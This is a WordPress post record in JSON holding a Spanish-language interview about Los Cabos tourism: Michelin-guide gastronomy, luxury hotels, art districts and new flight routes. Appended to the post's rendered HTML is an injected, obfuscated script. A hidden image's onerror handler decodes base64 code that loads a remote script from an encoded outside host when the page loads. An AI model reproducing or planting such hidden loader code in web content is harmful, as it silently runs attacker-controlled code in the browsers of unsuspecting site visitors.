{"id":8162,"date":"2024-04-12T11:53:41","date_gmt":"2024-04-12T14:53:41","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=8162"},"modified":"2025-08-13T15:44:52","modified_gmt":"2025-08-13T18:44:52","slug":"los-cabos-participo-activamente-como-destino-de-lujo-en-el-tianguis-turistico-de-mexico","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=8162","title":{"rendered":"Los Cabos particip\u00f3 activamente como destino de lujo en el Tianguis Tur\u00edstico de M\u00e9xico"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-cb55869915e77e4c3c7061d8b1fdebf0\" style=\"background-color:#506d02\"><em>Autoridades y empresarios del sector se reunieron en la feria tur\u00edstica m\u00e1s importante de Am\u00e9rica Latina en su edici\u00f3n n\u00famero 48 en Acapulco, Guerrero<\/em><\/h3>\n\n\n\n<p>En este marco, Travel2latam convers\u00f3 con Rodrigo Esponda, Director del Fideicomiso de Turismo de Los Cabos.<\/p>\n\n\n\n<p><strong>\u00bfQu\u00e9 novedades hay en el destino desde el punto de vista de turismo, infraestructura y conectividad?<\/strong><\/p>\n\n\n\n<p>Tenemos algunas novedades muy interesantes en los Cabos, Baja California Sur, M\u00e9xico. La primera es la gastronom\u00eda, ya que la gu\u00eda Michel\u00edn de M\u00e9xico est\u00e1 por a ser publicada. Un proyecto por el que muchos a\u00f1os se ha estado trabajando. Ellos nos buscaron incluir la regi\u00f3n de los Cabos por la diversidad del producto natural y fresco basado en la gastronom\u00eda, y por los chefs o cocineros de clase mundial que tenemos. Efectivamente encontraron que en los Cabos hay una diversidad de chefs y de cocineros que provienen de distintas partes del mundo, de M\u00e9xico y de pueblos locales. Obviamente esto est\u00e1 enfocado en los hoteles de lujo que han tra\u00eddo a chefs muy reconocidos del mundo.<\/p>\n\n\n\n<p>El producto local es un producto fresco de cero kil\u00f3metros, que es algo que nosotros mismos ni siquiera hemos estado tan conscientes, porque en la taquer\u00eda local elaboran tu taco con la pesca del d\u00eda. Esto habla de una cocina basada en cero kil\u00f3metros, que var\u00eda dependiendo de las temporadas y de la especialidad, pero que siempre conserva esa regionalidad que es tan importante hoy en d\u00eda y que ni siquiera es un trabajo consciente, sino que es algo que se ha ido mostrando naturalmente.&nbsp;<\/p>\n\n\n\n<p><strong>\u00bfEl destino tiene nuevas ofertas de hoteles que abrir\u00e1n pr\u00f3ximamente?<\/strong>&nbsp;<\/p>\n\n\n\n<p>S\u00ed, siempre cinco estrellas. Esto ha permitido a los Cabos posicionarse a nivel mundial como un destino de lujo, entendiendo el lujo no como el costo, sino la experiencia y la calidad de la misma. No es inaccesible, sino que lo que brindan es ese lujo de quedarte en un lugar, y por ejemplo, despertar y ver una ballena saltar frente de donde t\u00fa est\u00e1s qued\u00e1ndote. Es un lujo el poder quedarte en una bah\u00eda con una playa totalmente desierta en el mar de Cort\u00e9s y ver una ballena saltar en el amanecer. Ese tipo de experiencias que se pueden ofrecer en el destino son lo que nos contin\u00faa diferenciando. As\u00ed que estaremos en el marco del Tianguis teniendo algunas negociaciones muy interesantes enfocadas en la gastronom\u00eda, naturaleza, y el lujo de las nuevas aperturas que tienen los Cabos, en donde siempre buscamos ofrecer la m\u00e1s alta calidad a nuestros visitantes.&nbsp;<\/p>\n\n\n\n<p><strong>\u00bfQu\u00e9 es es lo que uno puede encontrar a nivel cultural en Los Cabos?<\/strong>&nbsp;<\/p>\n\n\n\n<p>Tenemos el distrito de arte m\u00e1s grande de M\u00e9xico, con 34 galer\u00edas, todas a una distancia muy cerca, en el centro hist\u00f3rico de San Jos\u00e9. Tenemos pueblos hist\u00f3ricos que fueron fundados por los misioneros europeos en 1700, que han mantenido toda la tradici\u00f3n y cultura, y han sido recreados, en donde adem\u00e1s ha habido una recuperaci\u00f3n de la gastronom\u00eda, no solamente en San Jos\u00e9 del Cabo, sino en Santiago, Miraflores, el Triunfo, Todos Santos. Son pueblos muy distintos, algunos ubicados dentro de la monta\u00f1a, otros muy cerca del mar de Cort\u00e9s y algunos otros dentro del Pac\u00edfico, con climas interesantes y con una mezcla \u00fanica de influencias europeas con los grupos locales. Adem\u00e1s, hay pinturas rupestres que fueron hechas por los grupos prehisp\u00e1nicos, los peric\u00faes y los waikuras.&nbsp;<\/p>\n\n\n\n<p><strong>\u00bfDe qu\u00e9 distancia habla cuando se refiere a conocer estos sitios?<\/strong><\/p>\n\n\n\n<p>Estamos hablando de un rango de distancia de 400 kil\u00f3metros, que se pueden recorrer en una semana perfectamente, ya sea con un transporte privado, con un veh\u00edculo o simplemente en autob\u00fas desde San Jos\u00e9 del Cabo hasta Todos Santos, y de ah\u00ed irse a la Paz, y regresar con total seguridad. &nbsp;Adem\u00e1s, el clima es muy estable, llueve menos de 10 d\u00edas en el a\u00f1o. Es un clima seco mucho m\u00e1s soportable que en el resto del Caribe y por ejemplo, no tenemos mosquitos.<\/p>\n\n\n\n<p><strong>\u00bfQu\u00e9 novedades tienen en cuanto a conectividad?<\/strong><\/p>\n\n\n\n<p>Tenemos varias rutas nuevas. El destino tiene 59 ciudades con conexi\u00f3n directa despu\u00e9s de Canc\u00fan, del Aeropuerto de Canc\u00fan, que es el segundo aeropuerto mejor conectado en el n\u00famero de ciudades que conectan directo a los Cabos. Dentro de M\u00e9xico tenemos 16 ciudades con vuelo directo hacia los Cabos, en EE.UU. contamos con 30 ciudades, y somos el segundo aeropuerto mejor conectado desde EE.UU. En Canad\u00e1 tenemos 11 y tenemos un vuelo directo de Alemania, Frankfurt, dos veces a la semana, que estar\u00e1 iniciando en noviembre con C\u00f3ndor.&nbsp;<\/p>\n\n\n\n<p>Fuimos por el mercado europeo y nos encontramos con el mercado alem\u00e1n, que tiene mucho inter\u00e9s en la parte natural de los destinos, va y recorre y est\u00e1 interesado en las ballenas, las monta\u00f1as, el desierto, y en un destino seguro como es Los Cabos. Estamos seguros que el mercado alem\u00e1n y el mercado europeo en general va a encontrar un destino que no puede encontrar en otra parte del mundo.<\/p>\n\n\n\n<p><strong>\u00bfCu\u00e1l es la situaci\u00f3n del ch\u00e1rter con Iberojet y el mercado espa\u00f1ol?<\/strong><\/p>\n\n\n\n<p>Iberojet es el grupo verticalmente integrado m\u00e1s grande de Espa\u00f1a y su modelo de negocio est\u00e1 muy enfocado a vender paquetes tur\u00edsticos. Al momento de tener el ch\u00e1rter, solamente se ofrec\u00eda la opci\u00f3n de volar una vez a la semana hacia los Cabos, y eso restring\u00eda, porque los paquetes tur\u00edsticos que estaba buscando la gente eran con mayor flexibilidad en la extensi\u00f3n, para poder tener combinaciones con otras zonas de M\u00e9xico.&nbsp;<\/p>\n\n\n\n<p>Los Cabos es una regi\u00f3n muy segura de viajar, no es un destino a donde uno tiene que ir para quedarse en un hotel siete d\u00edas, sino que hay que descubrirlo, ir al mar de Cort\u00e9s, a los pueblos, las tradiciones, la monta\u00f1a, y el Pac\u00edfico. Estamos teniendo un enfoque muy fuerte en los paquetes tur\u00edsticos que se pueden ofrecer con combinados en la regi\u00f3n y ofreciendo toda la diversidad que hay. La gente ve\u00eda el ch\u00e1rter y el paquete, y pensaba que era solamente para quedarse en un hotel, y luego ve\u00eda en realidad eran muchas opciones. Esto no estaba alineado ni con los intereses de ellos, ni con lo que estaba sucediendo en el destino para el visitante espa\u00f1ol que recorr\u00eda toda la zona. Decidimos que hay que ofrecer m\u00e1s flexibilidad en los paquetes, m\u00e1s all\u00e1 de la ruta que puede ser solamente directa, pero la revisaremos el a\u00f1o que entra, dependiendo de c\u00f3mo se vayan dando los n\u00fameros. El mercado espa\u00f1ol es muy relevante, se ha triplicado en los \u00faltimos dos a\u00f1os.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/es.travel2latam.com\/news-89171-los-cabos-participo-activamente-como-destino-de-lujo-en-el-tianguis-turistico-de-mexico\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"318\" height=\"83\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/02\/Captura-de-pantalla_7-2-2024_10135_es.travel2latam.com_.jpeg\" alt=\"\" class=\"wp-image-7863\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/02\/Captura-de-pantalla_7-2-2024_10135_es.travel2latam.com_.jpeg 318w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/02\/Captura-de-pantalla_7-2-2024_10135_es.travel2latam.com_-300x78.jpeg 300w\" sizes=\"(max-width: 318px) 100vw, 318px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Autoridades y empresarios del sector se reunieron en la feria tur\u00edstica m\u00e1s importante de Am\u00e9rica Latina en su edici\u00f3n n\u00famero 48 en Acapulco, Guerrero En este marco, Travel2latam convers\u00f3 con Rodrigo Esponda, Director del Fideicomiso de Turismo de Los Cabos. \u00bfQu\u00e9 novedades hay en el destino desde el punto de vista de turismo, infraestructura y [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":8163,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[30],"tags":[],"class_list":["post-8162","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-temas-relacionados"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8162","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8162"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8162\/revisions"}],"predecessor-version":[{"id":10179,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8162\/revisions\/10179"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/8163"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8162"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8162"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8162"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}